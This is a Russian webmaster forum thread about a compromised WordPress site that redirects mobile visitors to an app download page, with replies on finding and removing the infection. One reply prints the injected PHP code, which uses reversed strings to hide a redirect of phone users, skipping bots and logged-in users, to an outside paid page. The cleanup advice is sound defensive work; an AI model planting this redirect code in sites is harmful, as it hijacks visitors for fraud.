X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Похоже на взлом, Редирект мобильных на WP
GET_ini
GET_ini
Topic Starter сообщение 15.1.2014, 0:51; Ответить: GET_ini
Сообщение #1


Участник
***

Группа: User
Сообщений: 218
Регистрация: 6.11.2012
Из: Украина
Поблагодарили: 31 раз
Репутация:   6  


Когда сидишь с компьютера - никуда не редириктет... Захожу с Айфона - перекидывает на страницу загрузки какого-то приложения.

Пациент...

Куда рыть? С чего начать? Чем проверить?(
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
medved112
medved112
сообщение 15.1.2014, 0:52; Ответить: medved112
Сообщение #2


В меру упитанная панда в полном расцвете сил
*******

Группа: Active User
Сообщений: 3182
Регистрация: 17.10.2008
Поблагодарили: 1374 раза
Репутация:   139  


Файл .htaccess смотрите


--------------------
фыр фыр
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
GET_ini
GET_ini
Topic Starter сообщение 15.1.2014, 1:06; Ответить: GET_ini
Сообщение #3


Участник
***

Группа: User
Сообщений: 218
Регистрация: 6.11.2012
Из: Украина
Поблагодарили: 31 раз
Репутация:   6  


medved112, все чисто...

П.С WP последняя версия...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
jack
jack
сообщение 15.1.2014, 1:34; Ответить: jack
Сообщение #4


----------------
*******

Группа: Super Moderator
Сообщений: 7863
Регистрация: 22.3.2009
Из: глины
Поблагодарили: 10734 раза
Репутация:   591  


GET_ini, у меня было такое. Ищите последние изенённые файлы, зараза там сидит (это и файлы шаблона могут быть и скрипты в папке темы и всё что угодно)


--------------------
Stimul-Cash и RX-Partners - лидеры фарма бизнеса!

Официальный канал MaulTalk в Telegram
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ManGysITI
ManGysITI
сообщение 15.1.2014, 1:41; Ответить: ManGysITI
Сообщение #5


Бывалый
****

Группа: User
Сообщений: 426
Регистрация: 8.10.2011
Из: Минск
Поблагодарили: 141 раз
Репутация:   19  


мало найти заразу, нужно выяснить как она попала на сайт и закрыть эту дырку.


--------------------
Оптимизация и продвижение сайтов - консультации от 30$ Связь через личку
Качественный копирайт заказываю здесь.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Tollun
Tollun
сообщение 15.1.2014, 3:08; Ответить: Tollun
Сообщение #6


Старожил
******

Группа: Active User
Сообщений: 1595
Регистрация: 1.10.2009
Из: Хабаровск
Поблагодарили: 394 раза
Репутация:   66  


часов пять назад чистил от действий именно этого товарища 3 DLE сайта,
дата изменения файлов ‎13.11.2013 18:15, судя по всему так долго на палили, но если у ТС те же цифры то просто скидывает на эти данные (подозреваю, это так, или чудесным образом мы в один день столкнулись с этим).

Кстати для тех кто испытает сложности в поиске рекомендую запустить нормальный текстовый редактор умеющий искать в файлах (у меня EmEditor) и выполнить поиск, достаточно одной из строчек...
$gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];
if(!preg_match('/crawl|andex|oogle|bot/i',$gant)) {
if((preg_match('/ndroi|htc_|htc-|okia|pera min|j2me|martph|pera mo|phone|peramob|ymbian/i',$gant)) and (!isset ($_COOKIE['dle_user_id'])) and($_SERVER['REQUEST_URI'] != '/'))
{header(strrev('=REREFER_PTTH&1=ru&6?dom'.'/atsirk/'.'resu'.'/ten.'.'lx'.'ib'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}


А тем кто обиделся ищите чей платник flvs-updates.ru id 14316 ссылка на оферту infomobiles.net/oferta.php


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
viston
viston
сообщение 15.1.2014, 3:32; Ответить: viston
Сообщение #7


Завсегдатай
*****

Группа: Active User
Сообщений: 549
Регистрация: 19.1.2010
Из: Приморский край город Уссурийск
Поблагодарили: 98 раз
Репутация:   16  


Я айболитом сайты про сканировал и у меня зараза была в php , фалов 15-20 на одном сайте где эта дрянь была.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
andreykashops
andreykashops
сообщение 15.1.2014, 10:56; Ответить: andreykashops
Сообщение #8


WordPress is my Life..
******

Группа: Active User
Сообщений: 1427
Регистрация: 21.7.2012
Из: Украины
Поблагодарили: 633 раза
Репутация:   139  


У меня было дело запихнули подобный скрипт в сам jquery движка(просто вконец добавили), так-что там тоже стоит смотреть.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 15.1.2014, 12:59; Ответить: Electric
Сообщение #9


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


Тему с паблика качали?
Возможно шелл посунули с дырявой темой.
Если чистить, то нужно смотреть нет ли шеллов и бекдоров в темах.
Попробуйте поиск по файлам base64_decode ...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vadimon
vadimon
сообщение 15.1.2014, 22:15; Ответить: vadimon
Сообщение #10


Бывалый
****

Группа: User
Сообщений: 386
Регистрация: 20.5.2009
Из: Россия
Поблагодарили: 44 раза
Репутация:   8  


Смотри файл index.php, который в корне сайта лежит.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Взлом? Брут? DDos?
5 Infacto 683 4.12.2017, 17:11
автор: metvekot


 



RSS Текстовая версия Сейчас: 15.12.2017, 7:15
Дизайн